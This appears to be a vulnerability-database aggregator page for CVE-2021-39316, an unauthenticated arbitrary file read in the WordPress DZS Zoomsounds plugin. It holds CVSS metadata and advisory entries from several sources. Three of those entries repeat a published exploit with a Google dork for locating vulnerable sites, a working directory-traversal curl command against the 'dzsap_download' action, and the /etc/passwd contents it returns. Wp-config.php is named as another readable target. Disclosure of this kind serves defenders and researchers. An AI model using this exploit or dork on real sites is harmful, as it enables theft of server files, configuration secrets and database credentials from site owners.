WordPress DZS Zoomsounds 6.45 Arbitrary File Read

2021-12-03T00:00:00

Description

{"id": "PACKETSTORM:165146", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress DZS Zoomsounds 6.45 Arbitrary File Read", "description": "", "published": "2021-12-03T00:00:00", "modified": "2021-12-03T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html", "reporter": "Uriel Yochpaz", "references": [], "cvelist": ["CVE-2021-39316"], "immutableFields": [], "lastseen": "2021-12-03T17:33:29", "viewCount": 187, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-39316"]}, {"type": "dsquare", "idList": ["E-740"]}, {"type": "exploitdb", "idList": ["EDB-ID:50564"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:D2D60CF7-E4D3-42B6-8DFE-7809F87547BD"]}, {"type": "zdt", "idList": ["1337DAY-ID-37099"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["SPEECH"]}, {"type": "cve", "idList": ["CVE-2021-39316"]}, {"type": "dsquare", "idList": ["E-740"]}, {"type": "exploitdb", "idList": ["EDB-ID:50564"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:D2D60CF7-E4D3-42B6-8DFE-7809F87547BD"]}, {"type": "zdt", "idList": ["1337DAY-ID-37099"]}]}, "exploitation": null, "vulnersScore": 5.1}, "sourceHref": "https://packetstormsecurity.com/files/download/165146/wpdzszoomsounds645-fileread.txt", "sourceData": "`# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated) \n# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/ \n# Date: 2/12/2021 \n# Exploit Author: Uriel Yochpaz \n# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/ \n# Software Link: \n# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45 \n# Tested on: Linux (DZS Zoomsounds version 5.82) \n# CVE : CVE-2021-39316 \n \nThe vulnerability allows a remote attacker to perform directory traversal attacks. \nThe vulnerability exists due to input validation error when processing directory traversal sequences in the \"link\" parameter in the \"dzsap_download\" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system. \n \nMitigation: \nInstall update from vendor's website. \n \nVulnerable software versions ZoomSounds: \n1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, \n2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, \n3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, \n5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45 \n \nPoC: \nuser@ubuntu:~$ curl \"http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd\" \n \nroot:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \nsync:x:4:65534:sync:/bin:/bin/sync \ngames:x:5:60:games:/usr/games:/usr/sbin/nologin \nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin \nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin \nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin \nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin \nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin \nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin \nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin \nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin \nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin \nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin \ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin \nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin \nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false \nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false \nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false \nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false \nsyslog:x:104:108::/home/syslog:/bin/false \n_apt:x:105:65534::/nonexistent:/bin/false \nmessagebus:x:106:110::/var/run/dbus:/bin/false \nuuidd:x:107:111::/run/uuidd:/bin/false \nlightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false \nwhoopsie:x:109:117::/nonexistent:/bin/false \navahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false \navahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false \ndnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false \ncolord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false \nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false \nhplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false \nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false \npulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false \nrtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false \nsaned:x:119:127::/var/lib/saned:/bin/false \nusbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false \nuser:x:1000:1000:user,,,:/home/user:/bin/bash \nmysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false \n`\n", "_state": {"dependencies": 1647589307, "score": 0}}

{"cve": [{"lastseen": "2022-03-23T19:03:10", "description": "The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-31T12:15:00", "type": "cve", "title": "CVE-2021-39316", "cwe": ["CWE-22", "CWE-552"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39316"], "modified": "2021-12-14T20:22:00", "cpe": ["cpe:/a:digitalzoomstudio:zoomsounds:6.45"], "id": "CVE-2021-39316", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39316", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:digitalzoomstudio:zoomsounds:6.45:*:*:*:*:wordpress:*:*"]}], "patchstack": [{"lastseen": "2022-06-01T19:30:41", "description": "Unauthenticated Directory Traversal vulnerability discovered by DigitalJessica Ltd in WordPress ZoomSounds premium plugin (versions <= 6.45).\n\n## Solution\n\n\r\n Update the WordPress ZoomSounds premium plugin to the latest available version (at least 6.50).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-30T00:00:00", "type": "patchstack", "title": "WordPress ZoomSounds premium plugin <= 6.45 - Unauthenticated Directory Traversal vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39316"], "modified": "2021-08-30T00:00:00", "id": "PATCHSTACK:8F3504CF43DF5942CF803759738771D1", "href": "https://patchstack.com/database/vulnerability/dzs-zoomsounds/wordpress-zoomsounds-premium-plugin-6-45-unauthenticated-directory-traversal-vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "wpvulndb": [{"lastseen": "2021-11-26T19:29:09", "description": "The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the dzsap_download action using directory traversal in the link parameter\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-31T00:00:00", "type": "wpvulndb", "title": "DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39316"], "modified": "2021-08-31T07:36:00", "id": "WPVDB-ID:D2D60CF7-E4D3-42B6-8DFE-7809F87547BD", "href": "https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2022-02-01T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-12-04T00:00:00", "type": "zdt", "title": "WordPress DZS Zoomsounds 6.45 Plugin - Arbitrary File Read (Unauthenticated) Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39316"], "modified": "2021-12-04T00:00:00", "id": "1337DAY-ID-37099", "href": "https://0day.today/exploit/description/37099", "sourceData": "# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)\n# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/\n# Exploit Author: Uriel Yochpaz\n# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/\n# Software Link: \n# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45\n# Tested on: Linux (DZS Zoomsounds version 5.82)\n# CVE : CVE-2021-39316\n\nThe vulnerability allows a remote attacker to perform directory traversal attacks.\nThe vulnerability exists due to input validation error when processing directory traversal sequences in the \"link\" parameter in the \"dzsap_download\" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.\n\nMitigation:\nInstall update from vendor's website.\n\nVulnerable software versions ZoomSounds: \n1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,\n2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,\n3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,\n5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45\n\nPoC:\n[email\u00a0protected]:~$ curl \"http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd\"\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\nsyslog:x:104:108::/home/syslog:/bin/false\n_apt:x:105:65534::/nonexistent:/bin/false\nmessagebus:x:106:110::/var/run/dbus:/bin/false\nuuidd:x:107:111::/run/uuidd:/bin/false\nlightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false\nwhoopsie:x:109:117::/nonexistent:/bin/false\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false\navahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false\ndnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false\ncolord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false\nhplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false\nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false\npulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false\nrtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false\nsaned:x:119:127::/var/lib/saned:/bin/false\nusbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false\nuser:x:1000:1000:user,,,:/home/user:/bin/bash\nmysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false\n", "sourceHref": "https://0day.today/exploit/37099", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2021-11-26T18:37:32", "description": "File disclosure vulnerability in WordPress DZS ZoomSounds plugin\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-26T00:00:00", "type": "dsquare", "title": "WordPress DZS ZoomSounds < 6.50 File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39316"], "modified": "2021-09-26T00:00:00", "id": "E-740", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-05-13T17:34:14", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-03T00:00:00", "type": "exploitdb", "title": "WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-39316", "CVE-2021-39316"], "modified": "2021-12-03T00:00:00", "id": "EDB-ID:50564", "href": "https://www.exploit-db.com/exploits/50564", "sourceData": "# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)\r\n# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/\r\n# Date: 2/12/2021\r\n# Exploit Author: Uriel Yochpaz\r\n# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/\r\n# Software Link: \r\n# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45\r\n# Tested on: Linux (DZS Zoomsounds version 5.82)\r\n# CVE : CVE-2021-39316\r\n\r\nThe vulnerability allows a remote attacker to perform directory traversal attacks.\r\nThe vulnerability exists due to input validation error when processing directory traversal sequences in the \"link\" parameter in the \"dzsap_download\" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.\r\n\r\nMitigation:\r\nInstall update from vendor's website.\r\n\r\nVulnerable software versions ZoomSounds: \r\n1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,\r\n2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,\r\n3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,\r\n5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45\r\n\r\nPoC:\r\nuser@ubuntu:~$ curl \"http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd\"\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\r\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\r\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\r\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\r\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\r\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\r\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\r\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\r\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\r\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\r\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\r\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\r\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\r\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\r\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\r\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\r\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\r\nsyslog:x:104:108::/home/syslog:/bin/false\r\n_apt:x:105:65534::/nonexistent:/bin/false\r\nmessagebus:x:106:110::/var/run/dbus:/bin/false\r\nuuidd:x:107:111::/run/uuidd:/bin/false\r\nlightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false\r\nwhoopsie:x:109:117::/nonexistent:/bin/false\r\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false\r\navahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false\r\ndnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false\r\ncolord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false\r\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false\r\nhplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false\r\nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false\r\npulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false\r\nrtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false\r\nsaned:x:119:127::/var/lib/saned:/bin/false\r\nusbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false\r\nuser:x:1000:1000:user,,,:/home/user:/bin/bash\r\nmysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false", "sourceHref": "https://www.exploit-db.com/download/50564", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}

WordPress DZS Zoomsounds 6.45 Arbitrary File Read

Description

Related